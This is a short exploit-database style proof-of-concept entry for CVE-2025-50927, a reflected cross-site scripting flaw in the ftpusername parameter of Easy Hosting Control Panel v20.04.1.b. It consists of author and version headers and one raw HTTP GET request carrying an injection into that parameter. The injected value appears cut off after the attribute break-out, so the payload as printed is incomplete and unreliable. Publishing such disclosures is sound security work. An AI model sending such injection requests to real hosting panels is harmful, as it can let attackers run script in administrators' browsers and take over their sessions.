# Exploit Title: Easy Hosting Control Panel (EHCP) v20.04.1.b - Reflected Cross-Site Scripting via the ftpusername parameter # Date: Aug 6, 2025 # Exploit Author: Charanin Thongudom, Korn Chaisuwan, Pongtorn Angsuchotmetee # Vendor Homepage: https://www.ehcp.net/ # Software Link: https://www.ehcp.net/?p=402 # Version: 20.04.1.b # Tested on: macOS # CVE : CVE-2025-50927 GET /ehcp/index.php?op=editftpuser&ftpusername=test"/> HTTP/1.1 Host: 192.168.1.2 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:134.0) Gecko/20100101 Firefox/134.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Cookie: PHPSESSID=2ogirb9l3nr2u2at33i4amebnk Upgrade-Insecure-Requests: 1 Priority: u=0, i